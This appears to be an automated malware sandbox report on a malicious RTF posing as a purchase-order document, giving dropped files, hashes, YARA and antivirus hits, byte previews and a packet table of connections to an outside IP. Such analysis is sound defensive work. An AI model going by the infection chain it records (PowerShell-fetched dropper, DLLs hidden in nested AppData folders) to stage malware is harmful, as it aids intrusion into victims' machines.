                                                          Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Anabiotic\Farvelgninger\Satires\Trumpet1.wav

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\file.exe
                                                          File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 8 bit, mono 11025 Hz
                                                          Category:dropped
                                                          Size (bytes):66112
                                                          Entropy (8bit):5.179999054900731
                                                          Encrypted:false
                                                          SSDEEP:1536:BXbR5BGcY3nVQkEwzmnOqF/Mkb2iqSfrlAjX6vDVp89XTnvMNa48XSdMo70BaXDM:DzbYbIc3/
                                                          MD5:25C91AD0CC8B70FCAC47A132879893EF
                                                          SHA1:6F842222085854C037FB3E83ABEF2A841CFEF932
                                                          SHA-256:C08AB0F702503A43090DF125191B8C6C84B163DF40FF077C9D5CD064E33E1B93
                                                          SHA-512:F418FB5223485C2C96AF4B286A7B11850BBF52F9DBFADA3FD9D979B60A196D53294D2225EC8860228F3A949FAA1DD61ED913341A74E1B3F60A9F7F30659B2155
                                                          Malicious:false
                                                          Preview:RIFF8...WAVEfmt .........+...+......data..............~.~...||}.........sv{...||}|{}}}..||zzyxw{.....n_nz~.|zzyxy|.....~}{|{zz......hgrz.~{yyvvy{.....yxz~}|}......oep{~}yxvvvx|~...|vw|...~}......i_jvxyxyvvvz}...~xy~....|yz.....zEXly{{yywtw|...........zvw.....{7Yo}|{{{vss{.....|.....xru~....^6`p~|xzyvrt}....|w}....zrt.....i3[n|{wx|yvt.....xv}....ztvz....a1^n.{vy.}wv.....yx|....ysw}...9Gkw.{t|.|vx.....yu~....{x{....3Sr~.{t|~{vz.....ww~....z|.....u;^v..zu|~{w}....|wy....}x.....MIiy..ww}}xx~....xvz....{z.....{AZp|.~vx}ywz....|vw.....~......`Rcv..{vvwy||....vw}.............wjo}.{opt{.....|xy|~...........}kjr|.~|}~|}|..~}..............|mkrz.~{x|~........}..........}}zxwwz{{xz~......~.}}.........z~||wvy}.~}}~.~}...............{{}zvsx}.~|}}~........}........~z|}{zy}~}|}......................~}zz}~.~...~...................}}zz|.....~}~..................~}~|~~...}}~........~..............|~~...~.}}.....................}}~....~~|~.....................~~~~..}}~|.......~..............~~...~}}.|.

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Anabiotic\Farvelgninger\Satires\ZedGraph.dll

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\file.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):297472
                                                          Entropy (8bit):5.872932743464719
                                                          Encrypted:false
                                                          SSDEEP:6144:8NBtNg2np1eFXhtBE/ByZD9Q9thDhauHiNOafnk:8NB74XhHE5yZDYDhasg
                                                          MD5:1A2D40F5C02CEEB8EB6CD94932B39130
                                                          SHA1:8C460E86ABDB90E157A5E2DB5D3D24F8D51DC516
                                                          SHA-256:8B6E649444A08D77DFD1FD646F6FCC2490EC222A2C1F8E633B08F9DC7A66458A
                                                          SHA-512:F0C9AB06B8F73087D2B2A098D73A6F246D5E2506CEF19B27A942DC40E87F542E42EDAA2D97500B9E5F430F763AA182E0F43F29A02B4C2015EDAFC2B7F90D3278
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Y...........!................n.... ........... ..............................kl....@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H...........X...................P .............................................v.{.8.e...hNi.8.?..A.....51...%.q.z...).+...S11Ko.O.R3.x.{..y.sT.|}....*....zx.0.C.]..v...g.|z.P=c.[..Qc...0.0.s.....{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*z.{........{........{.......*.*..#........#........~....~....~....(....*b...~....~....~....(....*n......~....~....~....(....*R....~....~....(....*..0..D........(......}.....~....}......}......}..

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Belysningsvsenerne\Kuneste\Hebraized\Overtegningerne\PSReadLine.format.ps1xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\file.exe
                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1245
                                                          Entropy (8bit):5.462849750105637
                                                          Encrypted:false
                                                          SSDEEP:24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
                                                          MD5:5343C1A8B203C162A3BF3870D9F50FD4
                                                          SHA1:04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
                                                          SHA-256:DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
                                                          SHA-512:E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
                                                          Malicious:false
                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Busafgange\Mekanismens\Boo.wav

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\file.exe
                                                          File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 8 bit, mono 11025 Hz
                                                          Category:dropped
                                                          Size (bytes):80844
                                                          Entropy (8bit):6.256034406762346
                                                          Encrypted:false
                                                          SSDEEP:1536:YZJEZfE9Igi5zpy1dBpYb9CAW/NDvvhDfrQ4ZzgOlhwTMxQrvIJ7KJ6hxU/S9N2u:8GM9Tkzpy1d4b/W/JvhjrDDhwTsQrinB
                                                          MD5:C1B6BDA7931C1FE99589D7A9D0A0223E
                                                          SHA1:FA22FFD9FAE116EEEBC487B7F9DBC794FA180CBC
                                                          SHA-256:7E62946949E6982633ECF3C5A67121C6A101407E6DEB6C01D21A97344175ACC5
                                                          SHA-512:F0056CD015E7476A55A9B4F5C26D588332C1261D083762EFBAC875475ECB15E97521F2214088798D754F38D15BC080F046D10C68727BC533F6F51DA3A89BF087
                                                          Malicious:false
                                                          Preview:RIFF.;..WAVEfmt .........+...+......data.;.....~...~~~............zupty.......}z}{ws}......~x.......rlpwwvz..zy}......mgltz|...rv......}kY^}.......o_Yr....}bW]o.....}l\[f.....whaVYep}.....x.......|b]b^`t.....~yictyst|}sv............vS@H_w...........~iS\s.........l;.+Lf...........jQDH_w.........sdcp....}qoget..........rXGJTf......|gX[l..onucWi.....zmz.......}xwrz..yrs....l\blvtio~........x{ws....gccl.....vkoq~....zgRIUn........UVjokqzzjdz......}kXZgw.........zYSbox.............vy.xnx..w~....mMObmq..........~|..tprfRRbx......toy....yu..xfh}.....yqhmu|......{qnwtsy....sg^S_w.....`HUy....ocu.......wg\]^k........oXUi.........yeOGUn.......z......ufYj.......rswl]aow~..vnfhw......qO@Lk~.....}vst}~wZP]nw.........wcSKSm......hbnvxru|.|..............m[OZr...sfcr}.......qqror~.......pYXdv...znv.......ub^kw............xrkjt.......zquux|vkcaq.........smm`_q......pcw....{hQCX.......^]iv.{`Sdps.....rr|}}.....x...tx.zz...|\Sm......fh~.....{Y7:^......sj}...mi{}g]oy.......~..dQf.......|.......xfPUt...

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Busafgange\Mekanismens\Cricks.Mou

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\file.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):75820
                                                          Entropy (8bit):4.595608514165927
                                                          Encrypted:false
                                                          SSDEEP:1536:6BlrBeHUW0BV7mgDoDiTEy1ZRkLuHFcWtiG:6DVUUhBIsTxuLcFcWUG
                                                          MD5:563A22B0870A170122E7E6B12B1DC71B
                                                          SHA1:978953365D04DFA73DBBDDC19C1F51F65B467F9D
                                                          SHA-256:F0800C56C7CC987302235997ACC52FBBDC90913FEED800F19C7E6986A10EC158
                                                          SHA-512:53BF553889B4F279F924DC6652D823C4A19045D0D59262D65F00C4A85D72435DEF8CF7D4BBE235E61E7F5DDDEC1E0A6CB2D2CA42AAA570FB9CAFC8E66C299379
                                                          Malicious:false
                                                          Preview:..y.aa..............h................7......................!!.}}.......f.....wwww..................a.j.........###.........jjjjjjj.....bb........./....''.55555.......M........m.........K....y.%%........Q...........OOOO..1.;.........YY.^^^...............44...........HH.....b...............................R..!!.....HHH........@@@...ee.........................................::................sss.....++............Q............................mmm.............Z....R....................ll...{.....ee....~............J..5..............CC........... .CC..........`..|...=..........................qq.............QQQQ.K.........................................zzzz...................I.....l.............................__.........fff...dd......Z.''''....aa.......lll.H..............................................i.....tt.L...........%.............................333.....X.a............II........QQ.....gg...[[...................QQ....... ..@. ......55....f.. .....XXX.........?.tt.............RR.

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Busafgange\Mekanismens\License.rtf

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\file.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):11546
                                                          Entropy (8bit):5.130157501525605
                                                          Encrypted:false
                                                          SSDEEP:192:55sVeiuEzHQl+HjJWIZVVJ7niRk1RMBwugS:55sVebEzHQl5IZVVMRk1QSS
                                                          MD5:E2AFC893A72C3734DF31362E0962B153
                                                          SHA1:A44727652E6C84A1268945AA2F454F5424503411
                                                          SHA-256:CB7E80F94168D4C8F267255567F7232FAAAA3062D743C2375C3B7ECAD1F9718C
                                                          SHA-512:E13CBD0DE56639628266C18A34CB8F60052B588719F44F4EBC700D0D22BFF8AED74DD576A36737C131F4CD44E819AD074A50E7CF74994B313CE402F3E5349D2D
                                                          Malicious:false
                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe1033{\fonttbl{\f0\froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f35\fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\f36\fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Verdana;}{\f264\froman\fcharset238\fprq2 Times New Roman CE;}{\f265\froman\fcharset204\fprq2 Times New Roman Cyr;}{\f267\froman\fcharset161\fprq2 Times New Roman Greek;}..{\f268\froman\fcharset162\fprq2 Times New Roman Tur;}{\f269\fbidi \froman\fcharset177\fprq2 Times New Roman (Hebrew);}{\f270\fbidi \froman\fcharset178\fprq2 Times New Roman (Arabic);}{\f271\froman\fcharset186\fprq2 Times New Roman Baltic;}..{\f272\froman\fcharset163\fprq2 Times New Roman (Vietnamese);}{\f614\fswiss\fcharset238\fprq2 Tahoma CE;}{\f615\fswiss\fcharset204\fprq2 Tahoma Cyr;}{\f617\fswiss\fcharset161\fprq2 Tahoma Greek;}{\f618\fswiss\fcharset162\fprq2 Tahoma Tur;}..{\f619\fbid

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Busafgange\Mekanismens\Underlever.Als

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\file.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):289916
                                                          Entropy (8bit):7.020613805726218
                                                          Encrypted:false
                                                          SSDEEP:6144:zG2oSPADA0jxUN/4f3fW5Vfj0HyfC/nmZAgzoG:zGfDA0aNgPKVfj0UCeRR
                                                          MD5:73B129D4ADDF747733B355ABC2B1FEB3
                                                          SHA1:5721A84833ED7C601C569EC0AEA4D7C318F1D5EF
                                                          SHA-256:A906A2CD26285F34F1E66D51CEB807231DAC9F2E38E683EC210D5D8BF8DE155D
                                                          SHA-512:FBAC79148FD8E66DEEC4A5BC643F3750F3716093E23535D3E754FB634E05DD888FE63D33C8DFBEF64EFB5802DD3551659626F7FE2642CCBB5EAB493ECC49CE46
                                                          Malicious:false
                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\httputility.dll

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\file.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):42672
                                                          Entropy (8bit):5.9123418499114395
                                                          Encrypted:false
                                                          SSDEEP:768:bbGiXey9Kx/7yErMNHtxB3ptmL3zQYs+gAcckh/:bblh9KBNrMNHt33ptmL3TsVAW
                                                          MD5:77EF5801EA5C5BD331B83B813A741DDB
                                                          SHA1:71E010937EE6EBFB40C9F26EDE4C4F972B1DE5B6
                                                          SHA-256:D8CEDD5AF29E3539D7A48CEE62022D17F660627D32004B133F30D94F88432853
                                                          SHA-512:0FBD91DBD747BCA751F21821369929B6AA42C446DD1A1C1A1F794FE380E27F1A431DA1A794942DEF6FF1B43F791071BD5F1BF4259C32C401444014A318050C22
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8...k...k...k..lk...k0..j...k0..j...k0..j...k0..j...k...j...k...k..k...j...k...j...k...k...k..hk...k...j...kRich...k........PE..d......`.........." .....P...<.......R....................................................`.........................................`x..t....x..................................L....j..p...........................Pk..8............`...............................text....O.......P.................. ..`.rdata..Z#...`...$...T..............@..@.data................x..............@....pdata...............z..............@..@.rsrc...............................@..@.reloc..L...........................@..B................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\libgdk_pixbuf-2.0-0.dll

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\file.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):166947
                                                          Entropy (8bit):6.232611855964163
                                                          Encrypted:false
                                                          SSDEEP:3072:RROFUi/2PM0FQGxtMXG7aWTsHHAz9pjluR6xpRc8koGJG2R818X0BH8X1:mOvFQxWaTAz9qR6xNGJvz0BHM1
                                                          MD5:A06929ADEAD968870A2E6952CB7A0BD4
                                                          SHA1:CE8A3D0077CDB123ADECE62E4777BD0738E272EB
                                                          SHA-256:36B82AE3414F0941AED79604A17AB33994D3C0E868AA3DDAFD3B05F206BD4131
                                                          SHA-512:A6FD18D5996D92EF0A4C1BB3609BEF05F9F9E1044448E227B903292FE0B5773A89C8A02DE5CF2E1F560B176243B84BDF73353974FD66D710E1D36E31A5A10DFB
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........b........&"...%.....^......P.........D.....................................hL....`... ......................................p...........'........... ..................................................(....................................................text...............................`..`.data... ...........................@....rdata...l.......n..................@..@.pdata....... ......................@..@.xdata.......@......................@..@.bss.........`...........................edata.......p......................@..@.idata...'.......(...0..............@....CRT....X............X..............@....tls.................Z..............@....rsrc................\..............@....reloc...............`..............@..B................................................................................................................................

                                                          C:\Users\user\AppData\Roaming\file.exe

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                          Category:dropped
                                                          Size (bytes):676320
                                                          Entropy (8bit):7.876330435838718
                                                          Encrypted:false
                                                          SSDEEP:12288:8mNV/R3qdeJpAQxZg2ZE0PU4vPDC+0BOh8ybWIJQ3P0tX8glVk+4uWFG49:8mNV/RadXcvZ72PGX8g0uWA49
                                                          MD5:A1AFEF77EEC567ADB1076E8679AF207B
                                                          SHA1:842A3650C51486F329A4079CA4B62AE5542A8C98
                                                          SHA-256:2219616AFA29DD45A0B8926C8D840C5168F3B9E14A14F7569EA70EA8F5ACAA79
                                                          SHA-512:8DAFDDABA28D56F80B09545068A9A292A0D6E8C21D1D8CA0395B3AA113C467C4134A1781D62D78BA541AECF519DADA47F46D39EB59BF41B3B9366A3659027253
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: SUSP_NullSoftInst_Combo_Oct20_1, Description: Detects suspicious NullSoft Installer combination with common Copyright strings, Source: C:\Users\user\AppData\Roaming\file.exe, Author: Florian Roth (Nextron Systems)
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 6%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG.sw..PG..VA..PG.Rich.PG.........PE..L.....Oa.................f....... ...3............@..................................)....@.................................D........p..H............9..@............................................................................................text....e.......f.................. ..`.rdata...............j..............@..@.data...8............~..............@....ndata...@...0...........................rsrc...H....p......................@..@................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\Desktop\~$PO0015922.doc

                                                          Download File
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):162
                                                          Entropy (8bit):2.503835550707525
                                                          Encrypted:false
                                                          SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
                                                          MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
                                                          SHA1:23684CCAA587C442181A92E722E15A685B2407B1
                                                          SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
                                                          SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
                                                          Malicious:false
                                                          Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

                                                          Static File Info

                                                          General

                                                          File type:Unicode text, UTF-8 text, with very long lines (4154), with CRLF line terminators
                                                          Entropy (8bit):3.2054554743535415
                                                          TrID:
                                                          • Rich Text Format (5005/1) 55.56%
                                                          • Rich Text Format (4004/1) 44.44%
                                                          File name:TEPO0015922.doc
                                                          File size:248144
                                                          MD5:364dc6c0e8a18b796aa535516d04cb53
                                                          SHA1:da1e74c37691d9fd57eb2e73ef89b3aacbaa23d2
                                                          SHA256:dd6f2ad2370d52c77db8f3659c116f15c1897e2528694fe9f046be45928a2608
                                                          SHA512:f2efd5cb38e6474c83268e7454e268eee06f342cb5b55575a94a3cd206bf7096a8a4ca72a89f88e35668d8d4e39243ef5c2f097f438dd7a7c09716c2d4c3a1c0
                                                          SSDEEP:1536:i1iO8Lcs5Kpn0Ws/zhiordTpM6DiJW3BPLN4rZVzFz76mAg5eeVhMDw5wfL8:i+5xdXGVzFtr5RDAw5wfY
                                                          TLSH:C7342EA4654F4872E208AC5DA4D47141AEB6FED330C598B123AFF031DF55AF2AEC019B
                                                          File Content Preview:{\rtf\Fbidi \froman\fcharset238\ud1\adeff31507\deff0\stshfdbch31506\stshfloch31506\ztahffick41c05\fnhsfBi58207\deEflAng1045\deEglangfe1045\themelang1045\themelangfe1\themelangcs5{\lsdlockedexcept \lsdqformat2 \lsdpriority0 \lsdlocked0 Normal;\b865c6673647

                                                          File Icon

                                                          Icon Hash:e4eea2aaa4b4b4a4

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Mar 18, 2023 05:35:09.067533016 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.067636967 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.068167925 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.080630064 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.080676079 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.193610907 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.194020987 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.205684900 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.205714941 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.206222057 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.206656933 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.456878901 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.456933022 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.536165953 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.536231041 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.536279917 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.536362886 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.536362886 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.536412001 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.536447048 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.536469936 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.536469936 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.536509991 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.536788940 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.536919117 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.537058115 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.537101030 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.537123919 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.537152052 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.537184000 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.540963888 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.573869944 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.574013948 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.574083090 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.574112892 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.574141979 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.574281931 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.574593067 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.574716091 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.574747086 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.574773073 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.574845076 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.574954987 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.575092077 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.575222015 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.575278997 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.575308084 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.575359106 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.575377941 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.576313019 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.607295036 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.607373953 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.607841969 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.607882977 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.608021975 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.608021975 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.609024048 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.609095097 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.609266996 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.609266996 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.609287977 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.609328985 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.609383106 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.609592915 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.609671116 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.609759092 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.609759092 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.609777927 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.610021114 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.610275030 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.610409021 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.610429049 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.610429049 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.610455990 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.610553026 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.610553026 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.610868931 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.611001015 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.611136913 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.611136913 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.611160994 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.611284971 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.611387968 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.611470938 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.611557961 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.611638069 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.611654997 CET44349171149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:09.611707926 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.611742973 CET49171443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:09.612143993 CET49171443192.168.2.22149.102.154.62
